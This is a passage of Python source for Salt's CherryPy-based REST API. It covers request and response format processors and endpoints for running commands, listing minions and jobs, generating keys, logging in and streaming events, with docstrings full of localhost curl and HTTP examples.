# Transform the output from the handler into the requested output format
cherrypy.response.headers['Content-Type'] = best
out = cherrypy.response.processors[best]
try:
response = out(ret)
if six.PY3:
response = salt.utils.to_bytes(response)
return response
except Exception:
msg = 'Could not serialize the return data from Salt.'
logger.debug(msg, exc_info=True)
raise cherrypy.HTTPError(500, msg)
def hypermedia_out():
'''
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
'''
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
request.handler = hypermedia_handler
def process_request_body(fn):
'''
A decorator to skip a processor function if process_request_body is False
'''
@functools.wraps(fn)
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
'''
Accept x-www-form-urlencoded data (run through CherryPy's formatter)
and reformat it into a Low State data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
'''
if six.PY3:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = six.StringIO()
entity.fp.read(fp_out=contents)
contents.seek(0)
body_str = contents.read()
body_bytes = salt.utils.to_bytes(body_str)
body_bytes = six.BytesIO(body_bytes)
body_bytes.seek(0)
# Patch fp
entity.fp = body_bytes
# First call out to CherryPy's default processor
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy.serving.request.unserialized_data = entity.params
cherrypy.serving.request.raw_body = ''
@process_request_body
def json_processor(entity):
'''
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
'''
if six.PY2:
body = entity.fp.read()
else:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = six.StringIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = contents.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid JSON document')
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
'''
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
'''
if six.PY2:
body = entity.fp.read()
else:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = six.StringIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = contents.read()
try:
cherrypy.serving.request.unserialized_data = yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid YAML document')
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
'''
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
'''
if six.PY2:
body = entity.fp.read()
else:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = six.StringIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = contents.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
'''
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
'''
# Be liberal in what you accept
ct_in_map = {
'application/x-www-form-urlencoded': urlencoded_processor,
'application/json': json_processor,
'application/x-yaml': yaml_processor,
'text/yaml': yaml_processor,
'text/plain': text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (cherrypy.request.method.upper() == 'POST'
and cherrypy.request.headers.get('Content-Length', '0') == '0'):
cherrypy.request.process_request_body = False
cherrypy.request.unserialized_data = None
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, 'Content type not supported')
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
'''
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
'''
if cherrypy.request.method.upper() != 'POST':
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if data and isinstance(data, collections.Mapping):
# Make the 'arg' param a list if not already
if 'arg' in data and not isinstance(data['arg'], list):
data['arg'] = [data['arg']]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
cherrypy.tools.html_override = cherrypy.Tool('on_start_resource',
html_override_tool, priority=53)
cherrypy.tools.salt_token = cherrypy.Tool('on_start_resource',
salt_token_tool, priority=55)
cherrypy.tools.cors_tool = cherrypy.Tool('before_request_body',
cors_tool, priority=50)
cherrypy.tools.salt_auth = cherrypy.Tool('before_request_body',
salt_auth_tool, priority=60)
cherrypy.tools.hypermedia_in = cherrypy.Tool('before_request_body',
hypermedia_in)
cherrypy.tools.lowdata_fmt = cherrypy.Tool('before_handler',
lowdata_fmt, priority=40)
cherrypy.tools.hypermedia_out = cherrypy.Tool('before_handler',
hypermedia_out)
cherrypy.tools.salt_ip_verify = cherrypy.Tool('before_handler',
salt_ip_verify_tool)
###############################################################################
class LowDataAdapter(object):
'''
The primary entry point to Salt's REST API
'''
exposed = True
_cp_config = {
'tools.sessions.on': True,
'tools.sessions.timeout': 60 * 10, # 10 hours
# 'tools.autovary.on': True,
'tools.hypermedia_out.on': True,
'tools.hypermedia_in.on': True,
'tools.lowdata_fmt.on': True,
'tools.salt_ip_verify.on': True,
}
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
'''
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
'''
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session.release_lock()
        # If the lowstate loaded isn't a list, let's notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, 'Lowstates must be a list')
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk['token'] = token
if cherrypy.session.get('user'):
chunk['__current_eauth_user'] = cherrypy.session.get('user')
if cherrypy.session.get('groups'):
chunk['__current_eauth_groups'] = cherrypy.session.get('groups')
if client:
chunk['client'] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if 'arg' in chunk and not isinstance(chunk['arg'], list):
chunk['arg'] = [chunk['arg']]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, collections.Iterator):
for i in ret:
yield i
else:
yield ret
def GET(self):
'''
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: http
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
'''
return {
'return': "Welcome",
'clients': salt.netapi.CLIENTS,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
'''
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-H "Content-type: application/json" \\
-d '[{"client": "local", "tgt": "*", "fun": "test.ping"}]'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping"}]
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
'''
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token')))
}
class Minions(LowDataAdapter):
'''
Convenience URLs for working with minions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, mid=None):
'''
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: http
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
'''
cherrypy.request.lowstate = [{
'client': 'local', 'tgt': mid or '*', 'fun': 'grains.items',
}]
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token'))),
}
def POST(self, **kwargs):
'''
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-d '[{"tgt": "*", "fun": "status.diskusage"}]'
.. code-block:: http
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Type: application/json
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: http
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
'''
job_data = list(self.exec_lowstate(client='local_async',
token=cherrypy.session.get('token')))
cherrypy.response.status = 202
return {
'return': job_data,
'_links': {
'jobs': [{'href': '/jobs/{0}'.format(i['jid'])}
for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, jid=None, timeout=''):
'''
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: http
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: http
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
'''
lowstate = [{
'client': 'runner',
'fun': 'jobs.list_job' if jid else 'jobs.list_jobs',
'jid': jid,
}]
cherrypy.request.lowstate = lowstate
job_ret_info = list(self.exec_lowstate(
token=cherrypy.session.get('token')))
ret = {}
if jid:
ret['info'] = [job_ret_info[0]]
minion_ret = {}
returns = job_ret_info[0].get('Result')
for minion in returns:
if u'return' in returns[minion]:
minion_ret[minion] = returns[minion].get(u'return')
else:
minion_ret[minion] = returns[minion].get('return')
ret['return'] = [minion_ret]
else:
ret['return'] = [job_ret_info[0]]
return ret
class Keys(LowDataAdapter):
'''
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
'''
@cherrypy.config(**{'tools.salt_token.on': True})
def GET(self, mid=None):
'''
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: http
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: http
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
'''
if mid:
lowstate = [{
'client': 'wheel',
'fun': 'key.finger',
'match': mid,
}]
else:
lowstate = [{
'client': 'wheel',
'fun': 'key.list_all',
}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get('token'))
return {'return': next(result, {}).get('data', {}).get('return', {})}
@cherrypy.config(**{'tools.hypermedia_out.on': False, 'tools.sessions.on': False})
def POST(self, **kwargs):
r'''
Easily generate keys for a minion and auto-accept the new key
        Accepts all the same parameters as the :py:func:`key.gen_accept
        <salt.wheel.key.gen_accept>` wheel function.
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: http
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
'''
lowstate = cherrypy.request.lowstate
lowstate[0].update({
'client': 'wheel',
'fun': 'key.gen_accept',
})
if 'mid' in lowstate[0]:
lowstate[0]['id_'] = lowstate[0].pop('mid')
result = self.exec_lowstate()
ret = next(result, {}).get('data', {}).get('return', {})
pub_key = ret.get('pub', '')
pub_key_file = tarfile.TarInfo('minion.pub')
pub_key_file.size = len(pub_key)
priv_key = ret.get('priv', '')
priv_key_file = tarfile.TarInfo('minion.pem')
priv_key_file.size = len(priv_key)
fileobj = six.StringIO()
tarball = tarfile.open(fileobj=fileobj, mode='w')
tarball.addfile(pub_key_file, six.StringIO(pub_key))
tarball.addfile(priv_key_file, six.StringIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers['Content-Disposition'] = 'attachment; filename="saltkeys-{0}.tar"'.format(lowstate[0]['id_'])
headers['Content-Type'] = 'application/x-tar'
headers['Content-Length'] = fileobj.len
headers['Cache-Control'] = 'no-cache'
fileobj.seek(0)
return fileobj
class Login(LowDataAdapter):
'''
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
'''
def __init__(self, *args, **kwargs):
super(Login, self).__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
'''
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: http
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: text/html
'''
cherrypy.response.headers['WWW-Authenticate'] = 'Session'
return {
'status': cherrypy.response.status,
'return': "Please log in",
}
def POST(self, **kwargs):
'''
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-c ~/cookies.txt \\
-H "Accept: application/json" \\
-H "Content-type: application/json" \\
-d '{
"username": "saltuser",
"password": "saltuser",
"eauth": "auto"
}'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/json
Accept: application/json
{"username": "saltuser", "password": "saltuser", "eauth": "auto"}
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
'''
if not self.api._is_master_running():
raise salt.exceptions.SaltDaemonNotRunning(
'Salt Master is not available.')
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
username = creds.get('username', None)
# Validate against the whitelist.
if not salt_api_acl_tool(username, cherrypy.request):
raise cherrypy.HTTPError(401)
# Mint token.
token = self.auth.mk_token(creds)
if 'token' not in token:
raise cherrypy.HTTPError(401,
'Could not authenticate using provided credentials')
cherrypy.response.headers['X-Auth-Token'] = cherrypy.session.id
cherrypy.session['token'] = token['token']
cherrypy.session['timeout'] = (token['expire'] - token['start']) / 60
cherrypy.session['user'] = token['name']
if 'groups' in token:
cherrypy.session['groups'] = token['groups']
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get('external_auth', {}).get(token['eauth'], {})
if token['eauth'] == 'django' and '^model' in eauth:
perms = token['auth_list']
else:
# Get sum of '*' perms, user-specific perms, and group-specific perms
perms = eauth.get(token['name'], [])
perms.extend(eauth.get('*', []))
if 'groups' in token and token['groups']:
user_groups = set(token['groups'])
eauth_groups = set([i.rstrip('%') for i in eauth.keys() if i.endswith('%')])
for group in user_groups & eauth_groups:
perms.extend(eauth['{0}%'.format(group)])
if not perms:
logger.debug("Eauth permission list not found.")
except Exception:
logger.debug("Configuration for external_auth malformed for "
"eauth '{0}', and user '{1}'."
.format(token.get('eauth'), token.get('name')), exc_info=True)
perms = None
return {'return': [{
'token': cherrypy.session.id,
'expire': token['expire'],
'start': token['start'],
'user': token['name'],
'eauth': token['eauth'],
'perms': perms or {},
}]}
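# Illustrative sketch (not part of this module): how an HTTP client might use the
# /login URL documented above, via the third-party ``requests`` library. The host,
# credentials, and eauth backend below are assumptions for the example only.
def _example_client_login():
    import requests  # assumed to be installed; not a dependency of this module
    resp = requests.post(
        'http://localhost:8000/login',
        json={'username': 'saltuser', 'password': 'saltuser', 'eauth': 'auto'},
        headers={'Accept': 'application/json'},
    )
    resp.raise_for_status()
    token = resp.json()['return'][0]['token']
    # Subsequent requests authenticate by sending the token back in a header.
    return {'X-Auth-Token': token, 'Accept': 'application/json'}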
class Logout(LowDataAdapter):
'''
Class to remove or invalidate sessions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
'tools.lowdata_fmt.on': False,
})
def POST(self):
'''
Destroy the currently active session and expire the session cookie
'''
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {'return': "Your token has been cleared"}
class Run(LowDataAdapter):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`
salt-api does not enforce authorization; Salt's eauth system does that.
Local/Runner/WheelClient all accept ``username``/``password``/``eauth``
**or** ``token`` kwargs that are then checked by the eauth system. The
session mechanism in ``rest_cherrypy`` simply pairs a session with a Salt
eauth token and then passes the ``token`` kwarg in automatically.
If you already have a Salt eauth token, perhaps generated by the
:py:func:`mk_token <salt.runners.auth.mk_token>` function in the Auth
Runner module, then there is no reason to use sessions.
This endpoint accepts either a ``username``, ``password``, ``eauth`` trio,
**or** a ``token`` kwarg and does not make use of sessions at all.
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.sessions.on': False,
})
def POST(self, **kwargs):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`. Other than that, this URL is identical to the
:py:meth:`root URL (/) <LowDataAdapter.POST>`.
.. http:post:: /run
An array of :term:`lowstate` data describing Salt commands must be
sent in the request body.
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}]'
**Or** using a Salt Eauth token:
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"token": "<salt eauth token here>"
}]'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping", "username": "saltdev", "password": "saltdev", "eauth": "auto"}]
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
The /run endpoint can also be used to issue commands using the salt-ssh
subsystem.
When using salt-ssh, eauth credentials should not be supplied. Instead,
authentication should be handled by the SSH layer itself. The use of
the salt-ssh client does not require a salt master to be running.
Instead, only a roster file must be present in the salt configuration
directory.
All SSH client requests are synchronous.
**Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d fun='test.ping'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=ssh&tgt=*&fun=test.ping
**Example SSH response:**
.. code-block:: http
return:
- silver:
fun: test.ping
fun_args: []
id: silver
jid: '20141203103525666185'
retcode: 0
return: true
success: true
'''
return {
'return': list(self.exec_lowstate()),
}
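# Illustrative sketch (not part of this module): submitting lowstate to the /run
# URL documented above with inline eauth credentials, using the third-party
# ``requests`` library. Host and credentials are assumptions for the example only.
def _example_client_run():
    import requests  # assumed to be installed; not a dependency of this module
    lowstate = [{
        'client': 'local',
        'tgt': '*',
        'fun': 'test.ping',
        'username': 'saltdev',
        'password': 'saltdev',
        'eauth': 'auto',
    }]
    resp = requests.post(
        'http://localhost:8000/run',
        json=lowstate,
        headers={'Accept': 'application/json'},
    )
    resp.raise_for_status()
    return resp.json()['return']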
class Events(object):
'''
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
'''
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
'''
if auth_token is None:
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_session, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_session.get('token', auth_token)
# The eauth system does not currently support perms for the event
# stream, so we're just checking if the token exists not if the token
# allows access.
if salt_token and self.resolver.get_token(salt_token):
return True
return False
def GET(self, token=None, salt_token=None):
r'''
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: http
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE-compliant clients
should ignore unknown fields. This addition allows non-compliant
clients to watch only for certain tags without having to deserialize
the JSON object each time.
.. code-block:: http
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.info('Listening ...') };
source.onerror = function(err) { console.error(err) };
source.onmessage = function(message) {
var saltEvent = JSON.parse(message.data);
console.log(saltEvent.tag, saltEvent.data);
};
Note, the SSE stream is completely asynchronous and Salt is very fast.
If a job is created using a regular POST request, it is possible that
the job return will be available on the SSE stream before the response
for the POST request arrives. It is important to take that
asynchronicity into account when designing an application. Below are
some general guidelines.
* Subscribe to the SSE stream *before* creating any events.
* Process SSE events directly as they arrive and don't wait for any
other process to "complete" first (like an ajax request).
* Keep a buffer of events if the event stream must be used for
synchronous lookups.
* Be cautious about writing Salt's event stream directly to the DOM. It is
very busy and can quickly overwhelm the memory allocated to a
browser tab.
A full, working proof-of-concept JavaScript application is available
:blob:`adjacent to this file <salt/netapi/rest_cherrypy/index.html>`.
It can be viewed by pointing a browser at the ``/app`` endpoint in a
running ``rest_cherrypy`` instance.
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
'''
cookies = cherrypy.request.cookie
auth_token = token or salt_token or (
cookies['session_id'].value if 'session_id' in cookies else None)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers['Content-Type'] = 'text/event-stream'
cherrypy.response.headers['Cache-Control'] = 'no-cache'
cherrypy.response.headers['Connection'] = 'keep-alive'
def listen():
'''
An iterator to yield Salt events
'''
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True, auto_reconnect=True)
yield u'retry: {0}\n'.format(400)
while True:
data = next(stream)
yield u'tag: {0}\n'.format(data.get('tag', ''))
yield u'data: {0}\n\n'.format(json.dumps(data))
return listen()
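# Illustrative sketch (not part of this module): consuming the /events SSE stream
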